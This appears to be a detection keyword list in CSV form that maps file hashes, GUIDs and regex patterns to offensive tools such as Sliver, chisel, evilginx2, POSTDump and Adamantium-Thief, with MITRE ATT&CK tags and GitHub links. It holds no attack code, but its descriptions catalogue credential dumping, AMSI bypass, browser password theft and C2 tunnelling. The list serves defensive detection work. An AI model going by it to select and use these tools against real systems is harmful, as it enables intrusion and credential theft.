"*e2c4f99f6a5d7bd663caba698a5867963fa2917201dcad6e94de8ff4a3f6a256*",".{0,1000}e2c4f99f6a5d7bd663caba698a5867963fa2917201dcad6e94de8ff4a3f6a256.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*E2E64E89-8ACE-4AA1-9340-8E987F5F142F*",".{0,1000}E2E64E89\-8ACE\-4AA1\-9340\-8E987F5F142F.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*e2ea75cda1cbe2d628b20a93a49904f17d158866a644ff262d3c59731418c9a9*",".{0,1000}e2ea75cda1cbe2d628b20a93a49904f17d158866a644ff262d3c59731418c9a9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*e2fc147f2ac14938a48eebc9292258af10edcc7ef057acd07ff2ae6729f1cb7a*",".{0,1000}e2fc147f2ac14938a48eebc9292258af10edcc7ef057acd07ff2ae6729f1cb7a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*E2FDD6CC-9886-456C-9021-EE2C47CF67B7*",".{0,1000}E2FDD6CC\-9886\-456C\-9021\-EE2C47CF67B7.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","0","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*e3038dfa23e4c4707e73f5b4a214fe35796b805ef213e0e84da1e20cd5643fa5*",".{0,1000}e3038dfa23e4c4707e73f5b4a214fe35796b805ef213e0e84da1e20cd5643fa5.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*e3130262a4adfed3a225075d6eb93c5caeeba93b1253dc1b148f8a80c5c35a03*",".{0,1000}e3130262a4adfed3a225075d6eb93c5caeeba93b1253dc1b148f8a80c5c35a03.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*e32a0a69f8d98f79823aa087f883b16e04b4993090aedc0e29ca11b571e1bc4d*",".{0,1000}e32a0a69f8d98f79823aa087f883b16e04b4993090aedc0e29ca11b571e1bc4d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e370fb7d05e5b2ede88b633c05b9b21aa073678c392dda6407c112afe3430a61*",".{0,1000}e370fb7d05e5b2ede88b633c05b9b21aa073678c392dda6407c112afe3430a61.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e3731ce37c3e570254e35ac1201483592e708b43c898b3b21cca71a9f401d214*",".{0,1000}e3731ce37c3e570254e35ac1201483592e708b43c898b3b21cca71a9f401d214.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e376445d4c432d5f3c61e4584974941028c2975b97ee1461e4f00c65eb09a0ed*",".{0,1000}e376445d4c432d5f3c61e4584974941028c2975b97ee1461e4f00c65eb09a0ed.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*e376d23f48816e9d9a8d74cc9f8891b6fed2cff46d2b0efe989d8272b05931f2*",".{0,1000}e376d23f48816e9d9a8d74cc9f8891b6fed2cff46d2b0efe989d8272b05931f2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e379046040e17b60f1311e1d406a5bd9e34fd3f8b9e22cbceed612a6c3a689a9*",".{0,1000}e379046040e17b60f1311e1d406a5bd9e34fd3f8b9e22cbceed612a6c3a689a9.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*e3a6fd1ebf5912045e94cbe9cf44ec388351c89aab2054a647332e41f70f27df*",".{0,1000}e3a6fd1ebf5912045e94cbe9cf44ec388351c89aab2054a647332e41f70f27df.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e3a9b1c8dfe7bfcebd4d908f7cc36df8d09ee579ab10738308f0536782a14fe2*",".{0,1000}e3a9b1c8dfe7bfcebd4d908f7cc36df8d09ee579ab10738308f0536782a14fe2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e3e2ced2569d1ebef8f65b554979747881e5e060355fa6698c913036dfd892ba*",".{0,1000}e3e2ced2569d1ebef8f65b554979747881e5e060355fa6698c913036dfd892ba.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*e3f64597d5022d8716f45ffe57fb9f5f25ff64f42b9b61a0a64cb4521a453ebc*",".{0,1000}e3f64597d5022d8716f45ffe57fb9f5f25ff64f42b9b61a0a64cb4521a453ebc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e43289578251611f4f6f9952fa6ec598ed69b71c60ddc9077e69495fce018838*",".{0,1000}e43289578251611f4f6f9952fa6ec598ed69b71c60ddc9077e69495fce018838.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e4501ae5fc883efc3f0491b2d277e76fbb6d5b4d6618a2221d9fe08e8af41d00*",".{0,1000}e4501ae5fc883efc3f0491b2d277e76fbb6d5b4d6618a2221d9fe08e8af41d00.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e45f0bbbeee0fc901b50a0034dbeee8a1f2fe8b60ac58309580b3f7659dd9784*",".{0,1000}e45f0bbbeee0fc901b50a0034dbeee8a1f2fe8b60ac58309580b3f7659dd9784.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e475c6f8ad8471fe068b1cbce42300ecffb7e6825ba88bf7dff8c2969562f595*",".{0,1000}e475c6f8ad8471fe068b1cbce42300ecffb7e6825ba88bf7dff8c2969562f595.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e4ae0aec069aa237c5408c25c838464a65f7ca4e87453e6191f0629909fb2dfa*",".{0,1000}e4ae0aec069aa237c5408c25c838464a65f7ca4e87453e6191f0629909fb2dfa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e4df5a904c8eb505cb63d9905c398f632cf97ba193a6e25569d561d44f69e623*",".{0,1000}e4df5a904c8eb505cb63d9905c398f632cf97ba193a6e25569d561d44f69e623.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*e4f33ee9ba4d86685f8df4a89e192a354139edcf*",".{0,1000}e4f33ee9ba4d86685f8df4a89e192a354139edcf.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*e50bd0143399ca09e3a293f2546cdacb0bf093294dda39263474ed55d8e1743d*",".{0,1000}e50bd0143399ca09e3a293f2546cdacb0bf093294dda39263474ed55d8e1743d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e5139e7b40768b3a2a6be05138cd8c5cd5fc71eb60b108e0743077f0e4df3a4d*",".{0,1000}e5139e7b40768b3a2a6be05138cd8c5cd5fc71eb60b108e0743077f0e4df3a4d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e52f7c5cdfbcfd07c3af1a5d4b192e804f2a29cc1cacff6573ad701cbeb8440a*",".{0,1000}e52f7c5cdfbcfd07c3af1a5d4b192e804f2a29cc1cacff6573ad701cbeb8440a.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*E54195F0-060C-4B24-98F2-AD9FB5351045*",".{0,1000}E54195F0\-060C\-4B24\-98F2\-AD9FB5351045.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*E54195F0-060C-4B24-98F2-AD9FB5351045*",".{0,1000}E54195F0\-060C\-4B24\-98F2\-AD9FB5351045.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*E54195F0-060C-4B24-98F2-AD9FB5351045*",".{0,1000}E54195F0\-060C\-4B24\-98F2\-AD9FB5351045.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*e54299149f25b882cb0900a2977eb6d72a4fa88fb96b67b370981b42b66d7733*",".{0,1000}e54299149f25b882cb0900a2977eb6d72a4fa88fb96b67b370981b42b66d7733.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*e55c85d7da9a60ed31867b421961b3503df0b464e068e584fccc20892b05bef2*",".{0,1000}e55c85d7da9a60ed31867b421961b3503df0b464e068e584fccc20892b05bef2.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*e56cc23ffa05a02bdb22fd0db6b82e1b91d64ce467bf9be73236edab7cf11af2*",".{0,1000}e56cc23ffa05a02bdb22fd0db6b82e1b91d64ce467bf9be73236edab7cf11af2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e58bed7731a0a2a03e7c402d88a76a7d08c932494d6f5f78c0bc5f35b16ba9f6*",".{0,1000}e58bed7731a0a2a03e7c402d88a76a7d08c932494d6f5f78c0bc5f35b16ba9f6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e59ca634fa9b25563346bcb14e9e97d40dbfacc3159291aae5b104e99caede32*",".{0,1000}e59ca634fa9b25563346bcb14e9e97d40dbfacc3159291aae5b104e99caede32.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e5a991c13b8ba7bd2e435dec2682cd31de0013b3455c18e3883608e75363de3b*",".{0,1000}e5a991c13b8ba7bd2e435dec2682cd31de0013b3455c18e3883608e75363de3b.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*e5c8fd6cca1c71cb4302024e18e2ffb1d2cb00b583f391368adb5a73b803e3b0*",".{0,1000}e5c8fd6cca1c71cb4302024e18e2ffb1d2cb00b583f391368adb5a73b803e3b0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*e5d6eb36d1fe75a3f558093179a13f0cd74a661397eba1c7a0963200a8a365c0*",".{0,1000}e5d6eb36d1fe75a3f558093179a13f0cd74a661397eba1c7a0963200a8a365c0.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*E6104BC9-FEA9-4EE9-B919-28156C1F2EDE*",".{0,1000}E6104BC9\-FEA9\-4EE9\-B919\-28156C1F2EDE.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*e614bcf1b052fd1faf384fea62ddc4365051cef7bced133d54cd972be74e550f*",".{0,1000}e614bcf1b052fd1faf384fea62ddc4365051cef7bced133d54cd972be74e550f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*e62d0d5e71daca0aa1c2e899b0da9668167fcbd20060ef8c01a8d8b66f0a32b3*",".{0,1000}e62d0d5e71daca0aa1c2e899b0da9668167fcbd20060ef8c01a8d8b66f0a32b3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*e62f551dcaca8e16effff14816c75f5838640a23112052b50d99999bb4db7f1d*",".{0,1000}e62f551dcaca8e16effff14816c75f5838640a23112052b50d99999bb4db7f1d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e634b7711fbe4e8f83481dbb2191faba51915d5533ec94db6fb2f1029161d0d8*",".{0,1000}e634b7711fbe4e8f83481dbb2191faba51915d5533ec94db6fb2f1029161d0d8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e6351ad6e15aa6faa8d9ff9b476e66c6b6970c2f7ad7a04b08e0c7ee1af043bd*",".{0,1000}e6351ad6e15aa6faa8d9ff9b476e66c6b6970c2f7ad7a04b08e0c7ee1af043bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*e6428916f71a100481e78f6dac951b5c9e885b53dc8f1ab4e9e8a719528f70b8*",".{0,1000}e6428916f71a100481e78f6dac951b5c9e885b53dc8f1ab4e9e8a719528f70b8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - 